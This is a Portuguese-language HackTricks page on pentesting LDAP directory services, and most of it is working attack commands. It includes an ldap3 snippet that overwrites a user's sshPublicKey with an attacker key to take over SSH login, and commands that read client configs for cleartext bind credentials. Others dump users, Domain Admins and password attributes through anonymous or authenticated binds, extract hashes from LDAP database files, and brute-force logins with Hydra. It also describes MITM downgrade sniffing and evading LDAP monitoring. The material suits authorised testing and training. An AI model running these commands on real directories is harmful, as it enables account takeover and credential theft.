389, 636, 3268, 3269 - Pentesting LDAP

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

Confira os planos de assinatura!

Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.

Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

O uso do LDAP (Protocolo Leve de Acesso a Diretórios) destina-se principalmente a localizar várias entidades, como organizações, indivíduos e recursos — por exemplo, arquivos e dispositivos — dentro de redes, tanto públicas quanto privadas. Ele oferece uma abordagem mais enxuta em comparação com seu antecessor, DAP, por possuir uma base de código menor.

Os diretórios LDAP são estruturados para permitir sua distribuição por vários servidores, com cada servidor hospedando uma versão replicada e sincronizada do diretório, chamada Directory System Agent (DSA). A responsabilidade por processar as requisições cabe inteiramente ao servidor LDAP, que pode se comunicar com outros DSAs conforme necessário para fornecer uma resposta unificada ao solicitante.

A organização do diretório LDAP se assemelha a uma hierarquia em árvore, começando com o diretório raiz no topo. Esta se ramifica em países, que se dividem em organizações, depois em unidades organizacionais que representam diversas divisões ou departamentos, chegando finalmente ao nível de entidades individuais, incluindo pessoas e recursos compartilhados como arquivos e impressoras.

Porta padrão: 389 e 636(ldaps). Global Catalog (LDAP in ActiveDirectory) está disponível por padrão nas portas 3268 e 3269 para LDAPS.

PORT    STATE SERVICE REASON
389/tcp open  ldap    syn-ack
636/tcp open  tcpwrapped

LDAP Data Interchange Format

LDIF (LDAP Data Interchange Format) define o conteúdo do diretório como um conjunto de entradas. Também pode representar solicitações de atualização (Add, Modify, Delete, Rename).

dn: dc=local
dc: local
objectClass: dcObject

dn: dc=moneycorp,dc=local
dc: moneycorp
objectClass: dcObject
objectClass: organization

dn ou=it,dc=moneycorp,dc=local
objectClass: organizationalUnit
ou: dev

dn: ou=marketing,dc=moneycorp,dc=local
objectClass: organizationalUnit
Ou: sales

dn: cn= ,ou= ,dc=moneycorp,dc=local
objectClass: personalData
cn:
sn:
gn:
uid:
ou:
mail: pepe@hacktricks.xyz
phone: 23627387495

Linhas 1-3 definem o domínio de nível superior local
Linhas 5-8 definem o domínio de primeiro nível moneycorp (moneycorp.local)
Linhas 10-16 definem 2 unidades organizacionais: dev e sales
Linhas 18-26 criam um objeto do domínio e atribuem atributos com valores

Escrever dados

Observe que, se você puder modificar valores, poderá realizar ações realmente interessantes. Por exemplo, imagine que você pode alterar a informação “sshPublicKey” do seu usuário ou de qualquer usuário. É altamente provável que, se esse atributo existir, então ssh está lendo as chaves públicas do LDAP. Se você puder modificar a chave pública de um usuário, você será capaz de efetuar login como esse usuário mesmo que a autenticação por senha não esteja habilitada no ssh.

# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})

Artefatos LDAP do lado cliente no Linux

Em hosts Linux integrados com LDAP/AD, segredos valiosos frequentemente residem na configuração do cliente, não apenas no próprio servidor LDAP.

Arquivos comuns:

ls -l /etc/sssd/sssd.conf /etc/nslcd.conf /etc/ldap/ldap.conf /etc/krb5.conf 2>/dev/null
sed -n '1,120p' /etc/sssd/sssd.conf 2>/dev/null
sed -n '1,120p' /etc/nslcd.conf 2>/dev/null

Chaves de alto valor:

ldap_uri e ldap_search_base: onde e o que consultar
ldap_default_bind_dn e ldap_default_authtok: credenciais de bind reutilizáveis
id_provider / auth_provider: informa se o SSSD está usando LDAP, Kerberos ou ambos

Ações de acompanhamento úteis:

grep -nE '^(ldap_uri|ldap_search_base|ldap_default_bind_dn|ldap_default_authtok|id_provider|auth_provider)\\s*=' \
/etc/sssd/sssd.conf /etc/nslcd.conf 2>/dev/null

ldapsearch -x -H ldap://<target> -D "<bind-dn>" -w '<password>' -b "<base-dn>"

O que procurar:

sssd.conf / nslcd.conf legíveis por todos
credenciais de bind em cleartext
integrações SSH ou sudo baseadas em diretório que transformam uma configuração legível em impacto real de authz

Sniff clear text credentials

Se o LDAP for usado sem SSL, você pode sniff credenciais em clear text na rede.

Além disso, você pode realizar um ataque MITM na rede entre o servidor LDAP e o cliente. Aqui você pode fazer um Downgrade Attack para que o cliente use as credenciais em clear text para fazer login.

Se SSL for usado você pode tentar realizar MITM como mencionado acima, mas oferecendo um certificado falso; se o usuário o aceitar, você consegue fazer um Downgrade do método de autenticação e ver as credenciais novamente.

Acesso Anônimo

Bypass TLS SNI check

De acordo com this writeup apenas acessando o servidor LDAP com um nome de domínio arbitrário (como company.com) ele conseguiu contatar o serviço LDAP e extrair informações como usuário anônimo:

ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +

LDAP anonymous binds

LDAP anonymous binds permitem que atacantes não autenticados recuperem informações do domínio, como uma listagem completa de usuários, grupos, computadores, atributos de contas de usuário e a política de senhas do domínio. Esta é uma configuração legada, e desde o Windows Server 2003, apenas usuários autenticados têm permissão para iniciar LDAP requests.
No entanto, administradores podem ter precisado configurar uma aplicação específica para permitir anonymous binds e concedido mais acesso do que o pretendido, dando assim a usuários não autenticados acesso a todos os objetos no AD.

Anonymous LDAP enumeration with NetExec (null bind)

Se null/anonymous bind for permitido, você pode extrair usuários, grupos e atributos diretamente pelo módulo LDAP do NetExec sem credenciais. Filtros úteis:

(objectClass=*) para inventariar objetos sob um base DN
(sAMAccountName=*) para coletar user principals

Exemplos:

# Enumerate objects from the root DSE (base DN autodetected)
netexec ldap <DC_FQDN> -u '' -p '' --query "(objectClass=*)" ""

# Dump users with key attributes for spraying and targeting
netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" ""

# Extract just the sAMAccountName field into a list
netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" "" \
| awk -F': ' '/sAMAccountName:/ {print $2}' | sort -u > users.txt

What to look for:

sAMAccountName, userPrincipalName
memberOf e o posicionamento da OU para delimitar targeted sprays
pwdLastSet (padrões temporais), userAccountControl flags (disabled, smartcard required, etc.)

Note: Se anonymous bind não for permitido, normalmente você verá um Operations error indicando que um bind é necessário.

Credenciais válidas

Se você tiver credenciais válidas para fazer login no servidor LDAP, pode extrair todas as informações sobre o Domain Admin usando:

ldapdomaindump

pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]

Brute Force

Enumeração

Automatizado

Com isso, você poderá ver as informações públicas (como o nome de domínio):

nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials

Python

Veja a enumeração LDAP com python

Você pode tentar enumerar um LDAP com ou sem credenciais usando python: pip3 install ldap3

Primeiro tente conectar-se sem credenciais:

>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
True
>>> server.info

Se a resposta for True como no exemplo anterior, você pode obter alguns dados interessantes do servidor LDAP (como o naming context ou domain name) a partir de:

>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3
Naming contexts:
dc=DOMAIN,dc=DOMAIN

Uma vez que você tenha o naming context, pode fazer consultas mais interessantes. Esta consulta simples deve mostrar todos os objetos no diretório:

>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
>> connection.entries

Ou dump todo o ldap:

>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
True
>>> connection.entries

windapsearch

Windapsearch é um script Python útil para enumerar usuários, grupos e computadores em um domínio Windows utilizando consultas LDAP.

# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users

ldapsearch

Verifique null credentials ou se suas credentials são válidas:

ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839

Se você encontrar algo dizendo “bind must be completed”, isso significa que as credenciais estão incorretas.

Você pode extrair tudo de um domínio usando:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given

Extrair usuários:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"

Extrair computadores:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"

Extrair minhas informações:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Extrair Domain Admins:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Extrair Domain Users:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Extrair Enterprise Admins:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Extrair Administradores:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

Extrair Remote Desktop Group:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

Para ver se você tem acesso a alguma senha, você pode usar grep após executar uma das consultas:

<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"

Por favor, note que as senhas que você pode encontrar aqui podem não ser as reais…

pbis

Você pode baixar pbis aqui: https://github.com/BeyondTrust/pbis-open/ and it’s usually installed in /opt/pbis.
Pbis permite obter informações básicas facilmente:

#Read keytab file
./klist -k /etc/krb5.keytab

#Get known domains info
./get-status
./lsa get-status

#Get basic metrics
./get-metrics
./lsa get-metrics

#Get users
./enum-users
./lsa enum-users

#Get groups
./enum-groups
./lsa enum-groups

#Get all kind of objects
./enum-objects
./lsa enum-objects

#Get groups of a user
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done

#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done

#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
echo "$line";
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
echo "======================"
done

Interface Gráfica

Apache Directory

Download Apache Directory from here. Você pode encontrar um example of how to use this tool here.

jxplorer

Você pode baixar uma interface gráfica com servidor LDAP aqui: http://www.jxplorer.org/downloads/users.html

Por padrão está instalada em: /opt/jxplorer

Godap

Godap é uma interface interativa em terminal para LDAP que pode ser usada para interagir com objetos e atributos no AD e em outros servidores LDAP. Está disponível para Windows, Linux e MacOS e suporta simple binds, pass-the-hash, pass-the-ticket & pass-the-cert, além de várias outras funcionalidades especializadas, como pesquisar/criar/alterar/excluir objetos, adicionar/remover usuários de grupos, alterar senhas, editar permissões de objeto (DACLs), modificar Active-Directory Integrated DNS (ADIDNS), exportar para arquivos JSON, etc.

Você pode acessá-lo em https://github.com/Macmod/godap. Para exemplos de uso e instruções, leia a Wiki.

Ldapx

Ldapx é um proxy LDAP flexível que pode ser usado para inspecionar & transformar o tráfego LDAP de outras ferramentas. Pode ser usado para ofuscar tráfego LDAP na tentativa de contornar ferramentas de proteção de identidade & monitoramento LDAP e implementa a maioria dos métodos apresentados na palestra MaLDAPtive.

Você pode obtê-lo em https://github.com/Macmod/ldapx.

Autenticação via kerberos

Usando ldapsearch você pode autenticar-se via kerberos em vez de via NTLM usando o parâmetro -Y GSSAPI

POST

Se você puder acessar os arquivos onde os bancos de dados estão contidos (podem estar em /var/lib/ldap). Você pode extrair os hashes usando:

cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u

Você pode fornecer ao john o hash da senha (de ‘{SSHA}’ até ‘structural’ sem adicionar ‘structural’).

Arquivos de Configuração

Geral
containers.ldif
ldap.cfg
ldap.conf
ldap.xml
ldap-config.xml
ldap-realm.xml
slapd.conf
IBM SecureWay V3 servidor
V3.sas.oc
Microsoft Active Directory servidor
msadClassesAttrs.ldif
Netscape Directory Server 4
nsslapd.sas_at.conf
nsslapd.sas_oc.conf
OpenLDAP servidor de diretório
slapd.sas_at.conf
slapd.sas_oc.conf
Sun ONE Directory Server 5.1
75sas.ldif

Comandos Automáticos do HackTricks

Protocol_Name: LDAP    #Protocol Abbreviation if there is one.
Port_Number:  389,636     #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ldap.html

Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}

Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x

Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts

Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"

Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f

Entry_7:
Name: Netexec LDAP BloodHound
Command: nxc ldap <IP> -u <USERNAME> -p <PASSWORD> --bloodhound -c All -d <DOMAIN.LOCAL> --dns-server <IP> --dns-tcp

Referências

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

Confira os planos de assinatura!

Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.

Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.